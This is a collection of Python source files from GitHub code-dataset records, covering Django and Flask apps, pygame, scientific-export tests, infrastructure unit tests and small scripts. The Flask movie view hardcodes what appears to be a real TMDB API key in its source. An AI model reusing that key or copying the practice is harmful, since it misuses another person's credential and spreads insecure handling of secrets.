artifacts\", item.id, item=item)\n return\n if not artifacts_path:\n artifacts_path = self.get_artifacts_directory()\n for asset in assets:\n cache_path = self.get_cache_asset(item, \"data\", asset[\"id\"])\n artifact_path = os.path.join(artifacts_path, asset[\"id\"])\n if symlink:\n # when running locally we can symlink files and save time\n os.symlink(cache_path, artifact_path)\n else:\n # when building docker images we need to really copy the files\n shutil.copyfile(cache_path, artifact_path)\n\n ##\n ## Log methods\n ##\n\n def _prepare_log(self, msg, *args, **kwargs):\n \"\"\" Add contextual items to the log record \"\"\"\n msg, args, kwargs = super()._prepare_log(msg, *args, **kwargs)\n for item_name in (\"endpoint\", \"token\", \"job\", \"request\"):\n item = self.get_attribute(item_name, None)\n if item:\n kwargs[\"extra\"][item_name] = item\n return msg, args, kwargs\n\n ##\n ## Factory methods\n ##\n\n def get_item(self, item_id):\n \"\"\" Loads a model from database given its id whose prefix determines the model type, eg: ws_xxx for Workspace. \"\"\"\n # TODO limit access to objects available with request credentials\n assert isinstance(item_id, str), \"Factory.get_item - item_id should be a string with a valid item identifier\"\n try:\n if item_id.startswith(analitico.DATASET_PREFIX):\n return api.models.Dataset.objects.get(pk=item_id)\n if item_id.startswith(analitico.ENDPOINT_PREFIX):\n return api.models.Endpoint.objects.get(pk=item_id)\n if item_id.startswith(analitico.JOB_PREFIX):\n return api.models.Job.objects.get(pk=item_id)\n if item_id.startswith(analitico.MODEL_PREFIX):\n return api.models.Model.objects.get(pk=item_id)\n if item_id.startswith(analitico.NOTEBOOK_PREFIX):\n return api.models.Notebook.objects.get(pk=item_id)\n if item_id.startswith(analitico.RECIPE_PREFIX):\n return api.models.Recipe.objects.get(pk=item_id)\n if item_id.startswith(analitico.WORKSPACE_PREFIX):\n return api.models.Workspace.objects.get(pk=item_id)\n if item_id.startswith(analitico.AUTOML_PREFIX):\n return api.models.Automl.objects.get(pk=item_id)\n except Exception as exc:\n self.warning(\"get_item: could not find item %s\", item_id)\n raise exc\n try:\n validate_email(item_id)\n return api.models.User.objects.get(email=item_id)\n except validate_email.ValidationError:\n pass\n self.warning(\"get_item: could not find item type for %s\", item_id)\n raise NotFound(\"ServerFactory.get_item - could not find given item type \" + item_id)\n\n ##\n ## with Factory as: lifecycle methods\n ##\n\n def __exit__(self, exception_type, exception_value, traceback):\n \"\"\" Delete any temporary files upon exiting \"\"\"\n if self._temp_directory:\n shutil.rmtree(self._temp_directory, ignore_errors=True)\n\n\n# shared instance of server side factory\nfactory = ServerFactory()\n","repo_name":"analitico/analitico","sub_path":"source/api/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":9243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"18251624484","text":"from flask import render_template\nfrom app import app\nfrom urllib import request, parse\nimport json\n\n\n@app.route('/')\ndef index():\n title = \"Flask -- Working with Apis and json data\"\n\n requestVariables = {\n \"api_key\": '22f3e85e05becdb7e502c1f391dbd90d',\n 'limit': '10'\n }\n\n encodeVars = parse.urlencode(requestVariables)\n API_BASE_URL = 'https://api.themoviedb.org/3/movie/popular?'\n req_open = request.urlopen(API_BASE_URL + encodeVars)\n req_read = req_open.read()\n req_json = json.loads(req_read)\n movies = req_json['results']\n # img = 'https://image.tmdb.org/t/p/w500/'+ poster_path\n\n return render_template('index.html', title=title, movies=movies)\n","repo_name":"otienosteve/python_api_call-no-frameworks-used","sub_path":"John-Njau/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20121357402","text":"#!/usr/bin/python3\n\nimport pygame\nfrom yogini import Yogini\nimport sequences\n\nsuccesses, failures = pygame.init()\n\nscreen = pygame.display.set_mode((1280, 720))\n# screen = pygame.display.set_mode((0, 0), pygame.RESIZABLE)\nclock = pygame.time.Clock()\nFPS = 60\n\n# create the yogini\nyogini = Yogini()\nssize = pygame.display.get_surface().get_size()\nyogini.body.pos = [ssize[0] / 2, ssize[1] / 2]\nyogini.sequence = sequences.ashtanga\n\ntime = 0\n\nrunning = True\nwhile running:\n # Returns milliseconds between each call to 'tick'. The convert time to seconds.\n dt = clock.tick(FPS) / 1000\n time += dt\n screen.fill((255, 218, 148)) # Fill the screen with background color.\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.VIDEORESIZE:\n yogini.body.pos = [event.w / 2, event.h / 2]\n\n # let the yogini live\n yogini.live(time)\n\n # ...and draw it\n yogini.draw(screen)\n\n pygame.display.update()\n\nprint(\"Exited the game loop. Game will quit...\")\n","repo_name":"simon123h/pyogini","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"29305517641","text":"\"\"\"djangomom URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^projects/', include('project.urls',\n namespace='projects')),\n url(r'^apps/', include('app.urls',\n namespace='apps')),\n url(r'^models/', include('modeller.urls',\n namespace='models')),\n url(r'^account/', include('account.urls',\n namespace='account')),\n url(r'^', include('core.urls',\n namespace='core')),\n url(r'^endpoint/', include('endpoint.urls',\n namespace='endpoint')),\n url(r'^serializer/', include('serializer.urls',\n namespace='serializer')),\n]\n","repo_name":"emiamar/djangomom","sub_path":"djangomom/djangomom/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38522014574","text":"import cv2\nimport os\n\n\ndef remove_blurry_images(src_folder):\n img_names_list = os.listdir(src_folder)\n\n for img in img_names_list:\n if img.endswith('.jpeg'):\n img2 = cv2.imread(src_folder+img, cv2.IMREAD_GRAYSCALE)\n laplacian_var = cv2.Laplacian(img2, cv2.CV_64F).var()\n if laplacian_var < 10:\n print(img + \" :Image blurry\")\n os.remove(src_folder+img)\n\nremove_blurry_images(src_folder = '../processed_299_299/')","repo_name":"rishabkatta/Diabetic-Retinopathy-Detection","sub_path":"preprocessing_scripts/remove_blurry_images.py","file_name":"remove_blurry_images.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6183891636","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import is_numeric_dtype\nimport fiona\nimport rasterio\nfrom shapely.geometry import box\nimport pytest\nfrom gisutils import shp2df\nfrom mfexport.list_export import mftransientlist_to_dataframe\nfrom mfexport.inputs import export, summarize\nfrom .test_results_export import check_files, compare_polygons\n\n\ndef test_model_export(model):\n m, grid, output_path = model\n outfiles = export(m, grid, output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_packages_export(model):\n m, grid, output_path = model\n packages = ['dis'] # 'wel'\n outfiles = export(m, grid, packages[0], output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_package_export(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['thickness', 'top', 'botm']\n layers = list(range(get_nlay(m)))\n if m.version == 'mf6':\n variables.append('idomain')\n outfiles = export(m, grid, package='dis', output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef get_nlay(model):\n if model.version == 'mf6':\n nlay = model.dis.nlay.array\n else:\n nlay = model.dis.nlay\n return nlay\n\n\ndef get_nrow_ncol_nlay_nper(model):\n if model.version == 'mf6':\n nlay = model.dis.nlay.array\n nrow = model.dis.nrow.array\n ncol = model.dis.ncol.array\n nper = model.nper\n else:\n nrow, ncol, nlay, nper = model.nrow_ncol_nlay_nper\n return nrow, ncol, nlay, nper\n\n\ndef test_variables_export(model):\n m, grid, output_path = model\n variables = ['top', 'thickness']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid,\n variables=variables,\n output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_variable_export(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['botm']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable='botm', output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_transient2d_bar_graph(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['recharge']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable=variables, output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_export_irch(shellmound):\n m, grid, output_path = shellmound\n variables = ['irch']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable='irch', output_path=output_path)\n n_unique_pers = len(set(m.rch.irch.array.sum(axis=(1, 2, 3))))\n # should be a pdf and tif for each unique period\n assert len(outfiles) == n_unique_pers * 2\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_variable_export_with_package(model):\n m, grid, output_path = model\n variables = ['botm']\n packages = ['dis']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid,\n packages=packages,\n variables=variables,\n output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_summary(model):\n m, grid, output_path = model\n df = summarize(m, output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_package_list_export(model):\n m, grid, output_path = model\n packages = ['dis', 'rch'] #, 'wel']\n variables = ['botm', 'top', 'thickness', 'idomain', 'rech', 'recharge'] #, 'wel']\n if m.version == 'mf6':\n variables.append('irch')\n nrow, ncol, nlay, nper = get_nrow_ncol_nlay_nper(m)\n layers = list(range(nlay))\n outfiles = []\n for package in packages:\n outfiles += export(m, grid, package, output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n tifs = [f for f in outfiles if f.endswith('.tif')]\n for f in tifs:\n with rasterio.open(f) as src:\n assert src.width == ncol\n assert src.height == nrow\n compare_polygons(grid.bbox, box(*src.bounds))\n shps = [f for f in outfiles if f.endswith('.shp')]\n for f in shps:\n with fiona.open(f) as src:\n assert box(*src.bounds).within(grid.bbox)\n\n\ndef test_transient_list_export(model):\n m, grid, output_path = model\n outfiles = export(m, grid, 'wel', output_path=output_path)\n variables = ['wel0_stress_period_data']\n if m.version != 'mf6':\n variables = ['wel_stress_period_data']\n check_files(outfiles, variables=variables)\n df = mftransientlist_to_dataframe(m.wel.stress_period_data, squeeze=True)\n df.index = range(len(df))\n if 'cellid' in df.columns:\n df['cellid'] = df['cellid'].astype(str)\n df2 = shp2df(outfiles[0]).drop('geometry', axis=1)\n numeric_cols = [c for c in df.columns if is_numeric_dtype(df[c].dtype)]\n assert np.allclose(df[numeric_cols], df2[numeric_cols])\n\n\ndef test_export_sfr(model):\n m, grid, output_path = model\n # mf2005 style SFR export not implemented yet\n # TODO: implement mf2005 sfr package export\n if m.version != 'mf6':\n return\n outfiles = export(m, grid, 'sfr', output_path=output_path)\n # TODO: finish this test\n variables = ['shellmound.sfr']\n if m.version != 'mf6':\n variables = ['wel_stress_period_data']\n df = pd.DataFrame(m.sfr.reach_data.array)\n compare_cols = ['strtop']\n else:\n df = pd.DataFrame(m.sfr.packagedata.array)\n compare_cols = ['rlen', 'rwid', 'rgrd', 'rtp', 'rbth', 'rhk']\n check_files(outfiles, variables=variables)\n df.index = range(len(df))\n if 'cellid' in df.columns:\n df['cellid'] = df['cellid'].astype(str)\n df2 = shp2df(outfiles[0]).drop('geometry', axis=1)\n df2['cellid'] = list(zip(df2['k'], df2['i'], df2['j']))\n df2['cellid'] = df2['cellid'].astype(str)\n assert np.allclose(df[compare_cols], df2[compare_cols])","repo_name":"aleaf/modflow-export","sub_path":"mfexport/tests/test_model_export.py","file_name":"test_model_export.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
+{"seq_id":"40620596491","text":"n = int(input())\na = list(map(int, input().split()))\nma, mi = a[0], a[0]\nans1, ans2 = 0, 0\nfor v in a:\n if v > ma:\n ans1 += 1\n ma = v\n if v < mi:\n ans2 += 1\n mi = v\nprint(ans1, ans2)","repo_name":"wiwitrifai/competitive-programming","sub_path":"hackerrank/university-codesprint-2/breaking.py","file_name":"breaking.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"}
+{"seq_id":"86737707380","text":"print(\"\\n\\t\\tA partir dos valores da aceleração (a em m/s2), da velocidade inicial (v0 em m/s)\" +\n \"\\n\\t\\te do tempo de percurso (t em s). Calcular e exibir a velocidade final de automóvel em km/h.\")\n\naceleracao = float(input(\"\\n\\n\\t\\tDigite a aceleração do veiculo (em metros por segundo): \"))\nvelocidadeinicial = float(input(\"\\n\\t\\tDigite a velocidade inicial do veiculo (em km por hora): \"))\ntempo = float(input(\"\\n\\t\\tDigite o tempo do percurso do veiculo (em segundos): \"))\n\n# V = v0 + a. t\n\nsegundoconvertido = tempo * 60\naceleracaoconvertida = aceleracao / 3.6\nvelocidadefinal = velocidadeinicial+ (aceleracaoconvertida*segundoconvertido)\n\nif velocidadefinal <= 40:\n print(\"\\n\\t\\tVeiculo muito LENTO.\")\nelif (velocidadefinal > 40) & (velocidadefinal <= 60):\n print(\"\\n\\t\\tVeiculo em velocidade PERMITIDA.\")\nelif (velocidadefinal > 60) & (velocidadefinal <= 80):\n print(\"\\n\\t\\tVeiculo RAPIDO.\")\nelif velocidadefinal > 120:\n print(\"\\n\\t\\tVeiculo MUITO RAPIDO.\")\n","repo_name":"M4NS0/homeworks","sub_path":"Python/Lógica de Programação I/Exercícios/Lista4/exercicio06.py","file_name":"exercicio06.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34414828365","text":"import pygame\nimport os,sys\npygame.init()\n\nSCREENHEIGHT = 480\nSCREENWIDTH = 640\nscreen = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))\npygame.display.set_caption(\"Testing text\")\nbackground = pygame.Surface(screen.get_size())\nbackground = background.convert()\nFonz = pygame.font.Font(None,40)\ncount = 0\ndone = False\nclock = pygame.time.Clock()\nwhile not done:\n clock.tick(30)\n background.fill((255,255,255))\n \n screen.blit(background,(0,0))\n count += 1\n screen.blit(Fonz.render(\"Hello\",True,(0,0,0),(150,255,255)),(count,20))\n pygame.display.flip()\n\npygame.quit()","repo_name":"montepy/PyBullet","sub_path":"TextTesting/TextTesting/TextTesting.py","file_name":"TextTesting.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72604958889","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.io import ascii\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nplt.rcParams['xtick.major.size'] = 9\nplt.rcParams['xtick.major.width'] = 2\nplt.rcParams['xtick.minor.size'] = 6\nplt.rcParams['xtick.minor.width'] = 1\nplt.rcParams['ytick.major.size'] = 9\nplt.rcParams['ytick.major.width'] = 2\nplt.rcParams['ytick.minor.size'] = 6\nplt.rcParams['ytick.minor.width'] = 1\nplt.rcParams['axes.linewidth'] = 2\nplt.rcParams['font.size']=15\nplt.rcParams['mathtext.default']='regular'\nplt.rcParams['lines.markersize']=8\nplt.rcParams['xtick.major.pad']='3'\nplt.rcParams['ytick.major.pad']='3'\nplt.rcParams['ytick.minor.visible'] = 'True'\nplt.rcParams['xtick.minor.visible'] = 'True'\nplt.rcParams['xtick.direction'] = 'inout'\nplt.rcParams['ytick.direction'] = 'inout'\nplt.rcParams['ytick.right'] = 'True'\nplt.rcParams['xtick.top'] = 'True'\n\n# use a color-blind friendly palette\n# orange, red, light blue, dark blue\ncolors=['#FF9408','#DC4D01','#00A9E0','#016795']\n\n#dat=ascii.read('sample/scatter10.csv')\ndat=ascii.read('data/scatter-all.csv')\n#dat=ascii.read('data/scatter-all-fullsecs.csv')\n\nix,un=np.unique(dat['ticids'],return_index=True)\ndat=dat[un]\n\num=np.where(dat['teff'] < 8000.)[0]\nprint(len(um),'unique stars with Teff < 8000K')\n\nplt.ion()\nplt.clf()\n\nfig = plt.figure(figsize=(6, 8))\n\nupl=16\n\nplt.clf()\ngs = gridspec.GridSpec(2, 1)\n\nax0 = plt.subplot(gs[0, 0])\nplt.scatter(dat['teff'],dat['rad'],c=dat['tmags'],marker='o',alpha=1., vmax=upl, cmap='cubehelix',s=12, rasterized=True)\n#plt.legend(loc='best')\n#plt.plot([8000,4000],[5,3.4],ls='dashed',color='royalblue')\nplt.xlim([8000,2700])\nplt.ylim([0.1,200])\nplt.xlabel('Effective Temperature (K)')\nplt.ylabel('Stellar Radius (Solar)')\nplt.yscale('log')\nplt.annotate(\"(a)\", xy=(0.05, 0.1), xycoords=\"axes fraction\",fontsize=24,color='black')\ncbaxes = inset_axes(ax0, width=\"40%\", height=\"5%\", loc=2) \nplt.colorbar(cax=cbaxes, orientation='horizontal', label='Tmag')\n\nax1 = plt.subplot(gs[1, 0])\num=np.where(dat['teff'] < 8000.)[0]\nplt.semilogy(dat['tmags'][um],dat['rad'][um],'.',color=colors[3], rasterized=True)\nplt.xlabel('TESS Magnitude')\nplt.ylabel('Stellar Radius (Solar)')\nplt.xlim([2,16])\nplt.annotate(\"(b)\", xy=(0.05, 0.82), xycoords=\"axes fraction\",fontsize=24,color='black')\n\nplt.subplots_adjust(wspace=0.20,hspace=0.26,left=0.155,right=0.97,bottom=0.08,top=0.98)\n\n#plt.savefig('fig1.png',dpi=150)\n\n\n#plt.savefig('fig-hrd-all-v2.png',dpi=150)\n\n","repo_name":"danxhuber/tess20sec","sub_path":"sample/fig1.py","file_name":"fig1.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"24031845312","text":"from unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom click.testing import CliRunner\n\nimport empty_host\nfrom cosmicops.objects.host import CosmicHost, RebootAction\n\n\nclass TestEmptyHost(TestCase):\n def setUp(self):\n co_patcher = patch('cosmicops.empty_host.CosmicOps')\n self.co = co_patcher.start()\n self.addCleanup(co_patcher.stop)\n self.co_instance = self.co.return_value\n\n slack_patcher = patch('cosmicops.log.Slack')\n self.mock_slack = slack_patcher.start()\n self.addCleanup(slack_patcher.stop)\n\n self.runner = CliRunner()\n self.host = CosmicHost(Mock(), {\n 'id': 'h1',\n 'name': 'host1',\n 'resourcestate': 'Enabled'\n })\n self.host.disable = Mock(return_value=True)\n self.host.empty = Mock(return_value=(1, 1, 0))\n self.host.reboot = Mock(return_value=True)\n self.host.set_uid_led = Mock()\n self.co_instance.get_host.return_value = self.host\n\n def test_main(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.co.assert_called_with(profile='config', dry_run=False, log_to_slack=True)\n self.co_instance.get_host.assert_called_with(name='host1')\n self.host.disable.assert_called()\n self.host.empty.assert_called()\n self.host.reboot.assert_not_called()\n self.host.set_uid_led.assert_not_called()\n\n def test_skip_disable(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--skip-disable', 'host1']).exit_code)\n self.host.disable.assert_not_called()\n self.host.empty.assert_called()\n\n def test_disable_failure(self):\n self.host.disable.return_value = False\n\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.host.disable.assert_called()\n\n def test_fail_on_empty_host_response(self):\n self.co_instance.get_host.return_value = []\n\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.co_instance.get_host.assert_called_with(name='host1')\n\n def test_shutdown(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_called_with(RebootAction.HALT)\n self.host.set_uid_led.assert_called_with(True)\n\n def test_shutdown_with_failed_hosts(self):\n self.host.empty.return_value = (2, 1, 1)\n\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_not_called()\n self.host.set_uid_led.assert_not_called()\n\n def test_shutdown_failure(self):\n self.host.reboot.return_value = False\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_called_with(RebootAction.HALT)\n\n def test_dry_run(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['host1']).exit_code)\n self.co.assert_called_with(profile='config', dry_run=True, log_to_slack=False)\n","repo_name":"MissionCriticalCloud/cosmicOps","sub_path":"tests/test_empty_host.py","file_name":"test_empty_host.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"71823428328","text":"from scripts.helpful_scripts import get_account\nfrom brownie import SimpleStorage\n\n\nimport os\nimport json\nimport yaml\nimport shutil\n\n\ndef deploy_simple_storage(update_front_end=False):\n account = get_account()\n simple_storage = SimpleStorage.deploy({\"from\": account})\n print(f\"Contract deployed at: {simple_storage.address}\")\n\n if update_front_end:\n update_frontend()\n\n\ndef update_frontend():\n # Send the build folder to front-end\n copy_folders_to_front_end(\"./build\", \"./front-end/pages/chain-info\")\n # Send Brownie-config.yaml\n with open(\"brownie-config.yaml\", \"r\") as brownie_config:\n config_dict = yaml.load(brownie_config, Loader=yaml.FullLoader)\n with open(\"./front-end/pages/brownie-config.json\", \"w\") as brownie_config_json:\n json.dump(config_dict, brownie_config_json)\n\n\ndef copy_folders_to_front_end(src, dest):\n if os.path.exists(dest):\n shutil.rmtree(dest)\n shutil.copytree(src, dest)\n\n\ndef main():\n deploy_simple_storage(update_front_end=True)\n","repo_name":"cromewar/Full-Stack-Simple-Storage-Brownie","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28215438224","text":"def computer(a,b,c):\n\tif c == 1:\n\t\tk = a+b\n\t\t#print(\"和:%0.2f\"%k)\n\telif c == 2:\n\t\tk = a-b\n\t\tprint(\"差:%.02f\"%k)\n\telif c == 3:\n\t\tk = a*b\n\t\t#print(\"积:%.02f\"%k)\n\telif c == 4:\n\t\tif b != 0:\n\t\t\tk = a/b\n\t\t\t#print(\"商:%.02f\"%k)\n\t\telse:\n\t\t\t#print(\"输入格式不对\")\n\t\t\tc = \"输入格式不对\"\n\t\t\treturn c\n\treturn k\na = float(input(\"输入一个数\"))\nb = float(input(\"再输入一个数\"))\nc = int(input(\"输入运算符号: 1.和 2.差 3.乘 4.商\"))\nnumber = computer(a,b,c)\nprint(number)\n","repo_name":"superwenqistyle/1803","sub_path":"15day/计算器.py","file_name":"计算器.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41478736036","text":"### In this HashMap Implementation I am handing collision through chaining method ###\nclass HashMap:\n def __init__(self):\n self.max = 10\n self.arr = [[] for i in range(self.max)]\n \n#################### Hash Function ####################\n def get_hash(self, key):\n h = 0\n for char in key:\n h += ord(char) # ord gives us Ascii value of character \n return h % self.max\n\n################# Function to Add Item in HashMap ###################### \n def __setitem__(self,key, val):\n h = self.get_hash(key)\n found = False\n for idx, element in enumerate(self.arr[h]):\n if len(element) == 2 and element[0] == key:\n self.arr[h][idx] = (key,val) \n found = True\n break\n if not found:\n self.arr[h].append((key,val)) \n\n################# Function to Retrieve/Get Item from HashMap ###################### \n def __getitem__(self, key):\n h = self.get_hash(key)\n for element in self.arr[h]:\n if element[0] == key:\n return element[1]\n\n################# Function to Delete Item from HashMap ###################### \n def __delitem__(self, key):\n h = self.get_hash(key)\n for idx,element in enumerate(self.arr[h]):\n if element[0] == key:\n del self.arr[h][idx]\n\n\nh = HashMap()\n\nh[\"march 5\"] = 10 # Adding key,val pair\nh[\"march 6\"] = 12\nh[\"march 17\"] = 14\n\nprint(h[\"march 6\"])\nprint(h[\"march 17\"])\n\ndel h[\"march 17\"] # Deleting\n\nprint(h[\"march 17\"]) # Print after deleting\n\n\n\n","repo_name":"Najaf-Zawar/Data-Structures-Algorithms-DSA-in-Python","sub_path":"#5_HasMap(Chaining).py","file_name":"#5_HasMap(Chaining).py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20383110543","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass Institute(models.Model):\n name = models.CharField(\"Название института\",\n max_length=400, unique=True)\n description = models.TextField(\"Информация об институте\",\n default=\"None\", blank=True)\n employees_count = models.IntegerField(\"Число сотрудников\",\n default=1)\n scientist_count = models.IntegerField(\"Число молодых учёных\",\n default=0)\n chairman = models.CharField(\"Ф.И.О. председателя СМУ\",\n max_length=200)\n link = models.URLField(\"Ссылка на сайт института\")\n smu_link = models.URLField(\"Ссылка на сайт СМУ института\",\n null=True, blank=True)\n \n def __str__(self):\n return (f\"Institute(id={self.id}, name=\\\"{self.name}\\\", \"\n f\"info=\\\"{self.description[:50]}...\\\", \"\n f\"link=\\\"{self.link}\\\")\")\n\n\nclass Scientist(models.Model):\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n queue = models.OneToOneField(\"moderators.Queue\",\n on_delete=models.SET_NULL, null=True)\n institute = models.ForeignKey(Institute, on_delete=models.CASCADE,\n null=True)\n name = models.CharField(\"Имя учёного\", max_length=200)\n lab = models.CharField(\"Лаборатория\", max_length=300)\n position = models.CharField(\"Должность\", max_length=300)\n degree = models.CharField(\"Учёная степень\", max_length=200,\n null=True)\n scientific_interests = models.TextField(\"Сфера научных интересов\")\n \n def __str__(self):\n return (f\"ScientistInfo(id={self.id}, \"\n f\"institute=\\\"{self.institute.name}\\\", \"\n f\"name=\\\"{self.name}\\\", position=\\\"{self.position}\\\", \"\n \"scientific_interests=\"\n f\"\\\"{self.scientific_interests}\\\")\")\n\n\nclass ScientistLink(models.Model):\n scientist = models.ForeignKey(Scientist,\n on_delete=models.CASCADE)\n link = models.URLField(\"Ссылка на профиль\")\n service_name = models.CharField(\"Краткое описание\", max_length=250)\n\n\nclass Grant(models.Model):\n queue = models.OneToOneField(\"moderators.Queue\",\n on_delete=models.SET_NULL, null=True)\n name = models.CharField(\"Название гранта\", max_length=300)\n description = models.TextField(\"Описание гранта\", null=True)\n end_doc_date = models.DateTimeField(\"Дата окончания приёма заявок\",\n null=True)\n end_result_date = models.DateTimeField(\"Дата подведения итогов\",\n null=True)\n criteria = models.TextField(\"Критерии к участникам\", null=True)\n link = models.URLField(\"Ссылка на страницу с грантом\")\n \n def __str__(self):\n return (f\"Grant(id={self.id}, name=\\\"{self.name}\\\", \"\n f\"end_doc_date=\\\"{self.end_doc_date}\\\", \"\n f\"end_result_date=\\\"{self.end_result_date}\\\")\")\n","repo_name":"Jrol123/SYSC_site","sub_path":"smu_site/apps/info/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"21122658731","text":"import constant\nfrom card import HeroClass\nimport logging\nimport multiprocessing\nfrom match_multiprocess import Match\nfrom player.random_player import RandomPlayer\nimport time\nimport numpy\n\n\ndef test_rd_vs_rd_all_fireblast_deck(arg):\n \"\"\" test random vs. random \"\"\"\n match, idx = arg\n return match.play_one_match(idx).name\n\nif __name__ == \"__main__\":\n match_num = 6000\n\n start_health = 30\n deck = constant.mage_fix_deck\n logger = logging.getLogger('hearthstone')\n logger.addHandler(logging.StreamHandler())\n logger.setLevel(logging.WARNING)\n player1 = RandomPlayer(cls=HeroClass.MAGE, name='player1', first_player=True,\n start_health=start_health, fix_deck=deck)\n player2 = RandomPlayer(cls=HeroClass.MAGE, name='player2', first_player=False,\n start_health=start_health, fix_deck=deck)\n # test\n # logger.setLevel(logging.INFO)\n player1.reset(test=True)\n player2.reset(test=True)\n match = Match(player1, player2)\n\n start_time = time.time()\n win_results = []\n p = multiprocessing.Pool()\n for res in p.imap_unordered(test_rd_vs_rd_all_fireblast_deck, [(match, i) for i in range(match_num)]):\n win_results.append(res)\n duration = time.time() - start_time\n\n # print(\"win result:\", win_results)\n print(\"player1 win result:\", numpy.mean(numpy.array(win_results) == \"player1\"))\n print(\"duration:\", duration)","repo_name":"czxttkl/X-AI","sub_path":"useless/AI/play_game_multiprocess.py","file_name":"play_game_multiprocess.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
